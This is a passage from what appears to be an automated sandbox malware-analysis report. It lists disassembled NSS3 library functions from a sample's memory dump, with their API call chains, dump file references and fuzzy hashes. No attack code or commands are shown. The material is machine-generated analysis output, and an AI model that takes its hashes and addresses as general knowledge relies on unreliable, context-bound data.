                                                                                                                                                                                                                          Function 6C477F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C477F68
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6C477F7B
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C477FA7
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C59919C,?), ref: 6C477FBB
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C477FCA
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6C59915C,00000014), ref: 6C477FFE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1489184013-0
                                                                                                                                                                                                                          • Opcode ID: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
                                                                                                                                                                                                                          • Instruction ID: 02a647034d3a15237846ff093a676da9453b046391db2a91415908ce3a02ff0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B11121B1E042046AF720EA25AE50FBB76B8DF4465CF40062DEC59D2B81F720A948C2F2
                                                                                                                                                                                                                          Function 6C47BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800,6C4FDC29,?), ref: 6C47BE64
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C4FDC29,?), ref: 6C47BE78
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C4FDC29,?), ref: 6C47BE96
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C4FDC29,?), ref: 6C47BEBB
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6C4FDC29,?), ref: 6C47BEDF
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C4FDC29,?), ref: 6C47BEF3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3111646008-0
                                                                                                                                                                                                                          • Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                          • Instruction ID: b0811d20015fc1c628524bf971bcb1ecee4f7e14a2e3aa950b8a0cc3e997aafb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA11A272E012055BEB10DB659D55FAA3BA8EB41259F154028ED09EBB80EB31E909C7F1
                                                                                                                                                                                                                          Function 6C4B9850 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B985B
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000038), ref: 6C4B9871
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C59D9B0,?), ref: 6C4B98A2
                                                                                                                                                                                                                            • Part of subcall function 6C4CE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CE245
                                                                                                                                                                                                                            • Part of subcall function 6C4CE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4CE254
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4B98B7
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4B9901
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4B9910
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$ArenaFree$ErrorValue$Alloc_AllocateCriticalDecodeEnterInitItem_LockPoolSectionUnlockcalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2561846027-0
                                                                                                                                                                                                                          • Opcode ID: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
                                                                                                                                                                                                                          • Instruction ID: 70068e6b0163237e3f40caaa0eafbf4ddc911de95a7084ff705232e9ddfeda8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C110272A0124477FF00DE609C81FAA3A78AB653A9F150224FD1869791E773D8A483A1
                                                                                                                                                                                                                          Function 6C503C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C503D3F
                                                                                                                                                                                                                            • Part of subcall function 6C47BA90: PORT_NewArena_Util.NSS3(00000800,6C503CAF,?), ref: 6C47BABF
                                                                                                                                                                                                                            • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C503CAF,?), ref: 6C47BAD5
                                                                                                                                                                                                                            • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C503CAF,?), ref: 6C47BB08
                                                                                                                                                                                                                            • Part of subcall function 6C47BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C503CAF,?), ref: 6C47BB1A
                                                                                                                                                                                                                            • Part of subcall function 6C47BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C503CAF,?), ref: 6C47BB3B
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C503CCB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C503CE2
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C503CF8
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503D15
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503D2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4030862364-0
                                                                                                                                                                                                                          • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                          • Instruction ID: 69067ddd7e9b3e7ec47dc2e2c8469aad466ed2034e886c524c78884ea3680f4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D811C4B6B50600AFE7209A65EC41F9BB3E5AF51248F504538E81ADBB20F632F919C652
                                                                                                                                                                                                                          Function 6C4CFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 660648399-0
                                                                                                                                                                                                                          • Opcode ID: 94235923d40657ea39750aff7ada1259908c8024ddfdc9f063f2ced6214a4396
                                                                                                                                                                                                                          • Instruction ID: 00417055491a8b5125191b0d476d1f8975d295cfed122c0fdebd98708e970416
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94235923d40657ea39750aff7ada1259908c8024ddfdc9f063f2ced6214a4396
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 661100BA7026056BFB00DF55DC40E5B77A4AF54259F158038ED1C87B22E735E914C7D2
                                                                                                                                                                                                                          Function 6C57FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C57FD9E
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(000000FF), ref: 6C57FDB9
                                                                                                                                                                                                                            • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
                                                                                                                                                                                                                            • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C57FDD4
                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C57FDF2
                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3 ref: 6C57FE0D
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C57FE23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3365241057-0
                                                                                                                                                                                                                          • Opcode ID: 90e8ba26b482239a8eb33c561f3e3641ec10b4fbb9054642992055932be2e371
                                                                                                                                                                                                                          • Instruction ID: ba106c773ea658ded70a9bc6d5bc109679d3dddee0c988f447901ed13e3d7a8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90e8ba26b482239a8eb33c561f3e3641ec10b4fbb9054642992055932be2e371
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6101A1FAA142109FDF159E55FD00C527731BB4227D7150374E82A47BE1E722ED28C6DA
                                                                                                                                                                                                                          Function 6C506840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506846
                                                                                                                                                                                                                            • Part of subcall function 6C461770: calloc.MOZGLUE(00000001,0000019C,?,6C4615C2,?,?,?,?,?,00000001,00000040), ref: 6C46178D
                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506855
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C4755D0,00000000,00000000), ref: 6C4C868B
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C4C86A0
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C4C86B2
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C4C86C8
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C4C86E2
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C4C86EC
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C4C8700
                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50687D
                                                                                                                                                                                                                            • Part of subcall function 6C461770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618DE
                                                                                                                                                                                                                            • Part of subcall function 6C461770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618F1
                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50688C
                                                                                                                                                                                                                            • Part of subcall function 6C461770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618FC
                                                                                                                                                                                                                            • Part of subcall function 6C461770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C46198A
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C5068A5
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C5068B4
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
